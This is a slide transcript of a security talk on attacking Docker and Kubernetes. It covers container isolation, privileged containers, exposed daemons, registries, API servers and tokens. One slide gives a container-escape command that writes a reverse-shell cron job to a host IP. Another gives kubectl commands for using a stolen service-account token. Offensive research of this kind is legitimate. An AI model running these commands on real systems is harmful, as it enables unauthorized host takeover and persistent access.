Hacking Docker the Easy Way

Transcript

1. Hacking Docker the Easy Way

2. HELLO! I am Oritz A web & script Steam +1

   English is bad

3. Docker Introduction » Started in 2013 » Written in Go

   » Very active codebase (~ 33,000 commits & 44,000 stars ) » Lots of interest from Big Tech Co’s ( e.g. Google/Microsoft/RedHat/IBM ) » Delivering Containers as a Service ( e.g. AWS/GKE/Azure/Aliyun ) » More quickly and flexibility than traditional virtualization

4. Container vs VM

5. Our process is easy Docker Security Overview Hacking Docker Hacking

   Container Management Platform

6. Docker security Overview Namespaces, Cgroups, Capabilities and more

7. Namespaces Control what a process can see » PID »

   Mount » Network » UTS » IPS » User Namespaces & Cgroups Cgroups Control what a process can use » Memory » CPU » Devices » Blkio » Net_prio » Freezer » …

8. Capabilities Break up the monolithic root privilege » Useful for

   commands that need one privilege » Docker drops all capabilities except those needed » By default, a container own only 14 of 37 capabilities » Docker supports the addition and removal of capabilities » --privileged flag will give extended privileges to the container Kernel Capabilities

9. Seccomp Control the system calls that a process can make

   The default seccomp profile provides a sane default for running containers with seccomp and disables around 44 system calls out of 300+ Seccomp & Kernel Modules MAC Give fine grained control to restrict access to system resources » AppArmor » SELinux » GRSEC » TOMOYO » …

10. “OK, OK, We have known that docker is secure. But

    how to hack docker? Please show us the exploit.”

11. Hacking Docker Kernel, Privilege, Daemon and Registry

12. Am I in A Container? » ps aux » cat

    /proc/self/attr/current » cat /.dockerenv » cat /proc/self/cgroup » mount » …

13. Vulnerabilities in Docker images » Heart Bleed » Glibc Ghost

    » Shell Shock » SSL Death Alert » …

14. Attack surface of Docker

15. Linux Kernel Containers share the kernel of the host

16. DirtyCow Docker Container Escape PoC CVE-2016-5195

17. CaaS Platform » KVM » XEN » Escape From The

    Docker KVM-QEMU Machine

18. Docker in Docker

19. Privileged

20. What privileged flag do » Set empty process label »

    Warn of incompatibility with user namespaces » Add all host devices from /dev » Add device cgroup access rwm allow » Add all capabilities » Clear read only flag for /sys mount » Set read only paths to nil (*specs.Spec).Linux.ReadonlyPaths = nil » Set masked paths to nil (*specs.Spec).Linux.MaskedPaths = nil » Clear read only flag for cgroup mount » Set app armor profile "unconfined"

21. Have a look at /dev docker run --privileged

22. Mount Host directory

23. Docker Daemon The docker group grants privileges equivalent to the

    root user

24. Docker Swarm

25. Docker Remote API docker daemon -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

26. Docker Registry A server side application that stores and lets

    you distribute Docker images.

27. Registry Server Unauth

28. Pull and Push Download each blob using the API or

    just run “docker pull xxx.xx/xx”

29. Hacking Container Management Platform Take Kubernetes as an Example

30. Kubernetes

31. API Server Ports

32. API Server Unauth myapp.yaml » kubectl create -f myapp.yaml »

    kubectl --namespace=default exec -it myapp bash

33. Escape Docker » echo -e "* * * * *

    root bash -i >& /dev/tcp/1.2.3.4/80 0>&1\n" >> /mnt/etc/crontab

34. Service Accounts

35. Token in Pods

36. Token in Pods

37. Hacking Kubernetes » kubectl config set-cluster pwned --server=https://${public_ip} \ --insecure-skip-tls-verify

    » kubectl config set-credentials pwn --token=${serviceacount_token} » kubectl config set-context pwned --cluster=pwned --user=pwn » kubectl config use-context pwned

38. Find 0day in Github issues

39. There are more interesting problems yet to be solved with

    docker

40. How to find next exploit? Read the official documents carefully

    and Focus on the events of developer community

41. THANKS! Any questions? You can find me at @oritz https://0x0d.im